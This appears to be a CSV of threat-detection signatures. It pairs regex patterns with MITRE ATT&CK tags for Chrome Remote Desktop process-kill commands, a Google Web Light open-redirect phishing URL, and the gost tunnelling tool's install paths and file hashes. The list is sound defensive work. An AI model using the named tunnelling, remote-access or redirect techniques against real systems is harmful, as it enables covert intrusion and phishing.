"*Stop-Process -Force -Name remote_assistance_host*",".{0,1000}Stop\-Process\s\-Force\s\-Name\sremote_assistance_host.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Stop-Process -Force -Name remote_assistance_host_uiaccess*",".{0,1000}Stop\-Process\s\-Force\s\-Name\sremote_assistance_host_uiaccess.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Stop-Process -Force -Name remoting_native_messaging_host*",".{0,1000}Stop\-Process\s\-Force\s\-Name\sremoting_native_messaging_host.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SYSLOG_IDENTIFIER=chrome-remote-desktop*",".{0,1000}SYSLOG_IDENTIFIER\=chrome\-remote\-desktop.{0,1000}","greyware_tool_keyword","Google Remote Desktop","Google Chrome Remote Desktop to access remote computers - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotedesktop.google.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://googleweblight.com/i?u=*ipfs.*.html*",".{0,1000}https\:\/\/googleweblight\.com\/i\?u\=.{0,1000}ipfs\..{0,1000}\.html.{0,1000}","greyware_tool_keyword","googleweblight.com","Open Redirect vulnerability being exploited by threat actors in Google Web Light","T1584.001 - T1534","TA0008","N/A","N/A","Phishing","https://x.com/1ZRR4H/status/1723062039680000255","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"* gost.tar.gz*",".{0,1000}\sgost\.tar\.gz.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"* gost/cmd/gost*",".{0,1000}\sgost\/cmd\/gost.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","1","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*""gost installation completed!""*",".{0,1000}\""gost\sinstallation\scompleted!\"".{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*/go-gost/core/*",".{0,1000}\/go\-gost\/core\/.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","1","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*/gost.tar.gz*",".{0,1000}\/gost\.tar\.gz.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","1","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*/gost/raw/master/install.sh*",".{0,1000}\/gost\/raw\/master\/install\.sh.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","1","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*/gost/releases/download/*.tar.gz*",".{0,1000}\/gost\/releases\/download\/.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","1","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*\gost.tar.gz*",".{0,1000}\\gost\.tar\.gz.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","N/A","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*0276ec0ea830a61275437a98b81224b95712ecac5a7b9850bcbf2444ff46e47a*",".{0,1000}0276ec0ea830a61275437a98b81224b95712ecac5a7b9850bcbf2444ff46e47a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*02838437eb0acf23204585e8c21252b8bb9413dffbfcbfcd0ff9b05735a98ac1*",".{0,1000}02838437eb0acf23204585e8c21252b8bb9413dffbfcbfcd0ff9b05735a98ac1.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*02bacaa4ba2b64eb019f7b9da5861192bf0e85e4615a299035086decf9da7d06*",".{0,1000}02bacaa4ba2b64eb019f7b9da5861192bf0e85e4615a299035086decf9da7d06.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*047ab1af44f368297bf21b302a2548a556ca4e6c6b721940954e88f43d1cfba5*",".{0,1000}047ab1af44f368297bf21b302a2548a556ca4e6c6b721940954e88f43d1cfba5.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*06dfa5d139637adf641c5ce926f88aef127165d305af64e655ebaf069c7e3691*",".{0,1000}06dfa5d139637adf641c5ce926f88aef127165d305af64e655ebaf069c7e3691.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*078df1ee57a842cc2395869797ece90a7a6d7158090a84f8b78f41a3072505f6*",".{0,1000}078df1ee57a842cc2395869797ece90a7a6d7158090a84f8b78f41a3072505f6.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*0cfc3c9a964253eea12a9d5705ee0ca0967605483f1dca3c6ef28aed5fdc5b30*",".{0,1000}0cfc3c9a964253eea12a9d5705ee0ca0967605483f1dca3c6ef28aed5fdc5b30.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*0d7f56e583575888e68ce8c945fbd4c05842dceb352ddc7e8beeb86fe0d36861*",".{0,1000}0d7f56e583575888e68ce8c945fbd4c05842dceb352ddc7e8beeb86fe0d36861.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*0e110e91b09baca32b4fd9e0a972162f36f2e6e7c58bf4ee142bcda7c3411c93*",".{0,1000}0e110e91b09baca32b4fd9e0a972162f36f2e6e7c58bf4ee142bcda7c3411c93.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*10168a998e30a4f0d0d175f1aa2d5a533df3d69cf206f04f7d2686afdbe0949f*",".{0,1000}10168a998e30a4f0d0d175f1aa2d5a533df3d69cf206f04f7d2686afdbe0949f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*110ec720cf51d05c3a07ee73534f4c949644920a4760f1ceb8fc09e80172aaf0*",".{0,1000}110ec720cf51d05c3a07ee73534f4c949644920a4760f1ceb8fc09e80172aaf0.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*1296cb071a8524b29efc2c955fe2bffb4eaf545823e4dad698fb70344fc48074*",".{0,1000}1296cb071a8524b29efc2c955fe2bffb4eaf545823e4dad698fb70344fc48074.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*146a734ad8082ac508f0a82c7655f3bfe205f5f19f6c57cbd46ad24ef5b24404*",".{0,1000}146a734ad8082ac508f0a82c7655f3bfe205f5f19f6c57cbd46ad24ef5b24404.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*17eaa4e99dafe4b0cd9d250dccb2d2edb1c204922a58da7322926eb4cc2d6a70*",".{0,1000}17eaa4e99dafe4b0cd9d250dccb2d2edb1c204922a58da7322926eb4cc2d6a70.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*1912f7bb54e7c5ca2f93c0302a8bb55df6bd4ed8489d92619cfbbe970bb0bd7f*",".{0,1000}1912f7bb54e7c5ca2f93c0302a8bb55df6bd4ed8489d92619cfbbe970bb0bd7f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*1cd2acf92f240f2672bc390bdd1a0138eb0790732dca5c9f7e0d88f980ccc476*",".{0,1000}1cd2acf92f240f2672bc390bdd1a0138eb0790732dca5c9f7e0d88f980ccc476.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*1d716a8d9312001b2e35f0e9081e4efd60c0204e5bc9ce5728a82d02218ba849*",".{0,1000}1d716a8d9312001b2e35f0e9081e4efd60c0204e5bc9ce5728a82d02218ba849.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*1da052796a987601ac6085ccbe6957104e3d56656be4b4cfcfbef4796ba8217b*",".{0,1000}1da052796a987601ac6085ccbe6957104e3d56656be4b4cfcfbef4796ba8217b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*1dc896f509482e7b6892dcd0e4f83cf5417be5f7a9edd1da5afc810f49ebeb6c*",".{0,1000}1dc896f509482e7b6892dcd0e4f83cf5417be5f7a9edd1da5afc810f49ebeb6c.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*1ff7731d1b7af7110f27796e0fecb551cb5067030aa7d87e333d46f3f57f4214*",".{0,1000}1ff7731d1b7af7110f27796e0fecb551cb5067030aa7d87e333d46f3f57f4214.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*20c52dac0196b6cad71bcb9f4796ca4db198465e5366345347f64acdcb5ede7a*",".{0,1000}20c52dac0196b6cad71bcb9f4796ca4db198465e5366345347f64acdcb5ede7a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*254cc9b46f64f1ae8150c65632ce0e749dd894b20db9d39313e8030477152add*",".{0,1000}254cc9b46f64f1ae8150c65632ce0e749dd894b20db9d39313e8030477152add.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*25dec6e071fbf271817fa34a76abe61e41e2cb27cc52f25d78488340ccedd190*",".{0,1000}25dec6e071fbf271817fa34a76abe61e41e2cb27cc52f25d78488340ccedd190.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*2adf13d1d4585ea2efd72e3ffe5d6f9be0a553c66e3d171a0e13f18f7f05d375*",".{0,1000}2adf13d1d4585ea2efd72e3ffe5d6f9be0a553c66e3d171a0e13f18f7f05d375.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*2c344a29ed1d2107554b83137bdcd87db445be709b089520282945d21c755189*",".{0,1000}2c344a29ed1d2107554b83137bdcd87db445be709b089520282945d21c755189.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*2c9ecb79edd7d06bfec0529052f8fcfc4c9c9add475baa9179f6f9e23c456326*",".{0,1000}2c9ecb79edd7d06bfec0529052f8fcfc4c9c9add475baa9179f6f9e23c456326.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*2dfc1eeac50e3d783d124fa88c3072c2e475d6d95603b85d4774c37e37a76165*",".{0,1000}2dfc1eeac50e3d783d124fa88c3072c2e475d6d95603b85d4774c37e37a76165.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*2e8bd529f1452a300c60d13e57b46c35d1c3c2f8b42a4b03ce82fbf78211af49*",".{0,1000}2e8bd529f1452a300c60d13e57b46c35d1c3c2f8b42a4b03ce82fbf78211af49.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*2ec1517476a6c8d3a524fba2461233a2f44f7fdc5ee8906aa7bead7514854cc7*",".{0,1000}2ec1517476a6c8d3a524fba2461233a2f44f7fdc5ee8906aa7bead7514854cc7.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*2f36ff1ba8c834c8a47211ccd879acb37f75b1b34cc814c39728c7a190151c97*",".{0,1000}2f36ff1ba8c834c8a47211ccd879acb37f75b1b34cc814c39728c7a190151c97.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*2f6d418d6b2a974433581cdb959f6b0f8f305fa48c00ad44dc19a9d7504a4c5f*",".{0,1000}2f6d418d6b2a974433581cdb959f6b0f8f305fa48c00ad44dc19a9d7504a4c5f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*2f6d418d6b2a974433581cdb959f6b0f8f305fa48c00ad44dc19a9d7504a4c5f*",".{0,1000}2f6d418d6b2a974433581cdb959f6b0f8f305fa48c00ad44dc19a9d7504a4c5f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*308f03aa9f8e2055a27007bb566fd24068cf518e7042aa000a0bc53b29214c9d*",".{0,1000}308f03aa9f8e2055a27007bb566fd24068cf518e7042aa000a0bc53b29214c9d.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*30ff629067623e3bb4a4056527fdc3e9d9c7b2428836445ea58a88c720173296*",".{0,1000}30ff629067623e3bb4a4056527fdc3e9d9c7b2428836445ea58a88c720173296.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*3101575fbdbee11b2d4d592f92582489c842f20fab0cb2ade9f2f3a207c202d8*",".{0,1000}3101575fbdbee11b2d4d592f92582489c842f20fab0cb2ade9f2f3a207c202d8.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*330c1069831f7c60d89436905cb8ac6794d40896e9b8b5e539a2c9876a9cd324*",".{0,1000}330c1069831f7c60d89436905cb8ac6794d40896e9b8b5e539a2c9876a9cd324.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*34abcda5eb491ea4b167e4b2d9aa157adb87f035c1fbcc43aaedb6f9e3018418*",".{0,1000}34abcda5eb491ea4b167e4b2d9aa157adb87f035c1fbcc43aaedb6f9e3018418.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*36152e9a1e47217f9aa049b7893acd4cf08098874396ff06b0c52373bedab5fb*",".{0,1000}36152e9a1e47217f9aa049b7893acd4cf08098874396ff06b0c52373bedab5fb.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*380d521181512fb9f4276d6f8fabbdcce082cee36efe133f68000a153ac3960f*",".{0,1000}380d521181512fb9f4276d6f8fabbdcce082cee36efe133f68000a153ac3960f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*395fe3d081d4bcd031770591913016fd6f5af3e7fdbf29219610acca1da3b6c9*",".{0,1000}395fe3d081d4bcd031770591913016fd6f5af3e7fdbf29219610acca1da3b6c9.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*39f119574d66d00a12ab7ed202bca6e41204bf838fb5f58ca170bdf76beaa445*",".{0,1000}39f119574d66d00a12ab7ed202bca6e41204bf838fb5f58ca170bdf76beaa445.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*3be15a6f8a0de053d4fde83cfba6880cfbbf83566b37c35a6a7ab82a7dfc3441*",".{0,1000}3be15a6f8a0de053d4fde83cfba6880cfbbf83566b37c35a6a7ab82a7dfc3441.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*3c5d123aea23f54ce965bd72d3019945db3f07524fba2e76e36a6a0efc0d8650*",".{0,1000}3c5d123aea23f54ce965bd72d3019945db3f07524fba2e76e36a6a0efc0d8650.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*3f11e922d2e804a34396aab6ec9e7e48a23be82982a90f7b1d407c9b92062991*",".{0,1000}3f11e922d2e804a34396aab6ec9e7e48a23be82982a90f7b1d407c9b92062991.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*40dd6156b4167e4846f1ea091960a88547de9d3986d96a7b9044a934aec61d86*",".{0,1000}40dd6156b4167e4846f1ea091960a88547de9d3986d96a7b9044a934aec61d86.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*4363de01f1dfd6b393f889bb916128df95a02bc1df2c294e28a48bd197a685f2*",".{0,1000}4363de01f1dfd6b393f889bb916128df95a02bc1df2c294e28a48bd197a685f2.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*43ba05d30fa8d86631e5b24dd8eb9a81e189d146a3eb39d6cf230329bce81c8d*",".{0,1000}43ba05d30fa8d86631e5b24dd8eb9a81e189d146a3eb39d6cf230329bce81c8d.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*450bf298cc66b2d739e6270a9e509eed80026db3551e3754b3810b63db62354e*",".{0,1000}450bf298cc66b2d739e6270a9e509eed80026db3551e3754b3810b63db62354e.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*4549122ba17882aaa89999d170ca7cfe4d2f4d9cc9b6c57961abf276576c9d42*",".{0,1000}4549122ba17882aaa89999d170ca7cfe4d2f4d9cc9b6c57961abf276576c9d42.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*4585828aa5ae1aec2a5d5bfb371236dc180ed47489a6684d468b8b83a5d300dd*",".{0,1000}4585828aa5ae1aec2a5d5bfb371236dc180ed47489a6684d468b8b83a5d300dd.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*4600b361c95e232cf152cb7a0e9c004fd8e76e577ced2bae2e063dda12a5c50b*",".{0,1000}4600b361c95e232cf152cb7a0e9c004fd8e76e577ced2bae2e063dda12a5c50b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*47d38c5f263c1372cb9ce16e921c06cf34911ba15639f6151e07fb47abb296fd*",".{0,1000}47d38c5f263c1372cb9ce16e921c06cf34911ba15639f6151e07fb47abb296fd.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*48174210fbafbc975cb8774bc4fa277aceb5a1ba565deef2df244173a21ecc0a*",".{0,1000}48174210fbafbc975cb8774bc4fa277aceb5a1ba565deef2df244173a21ecc0a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
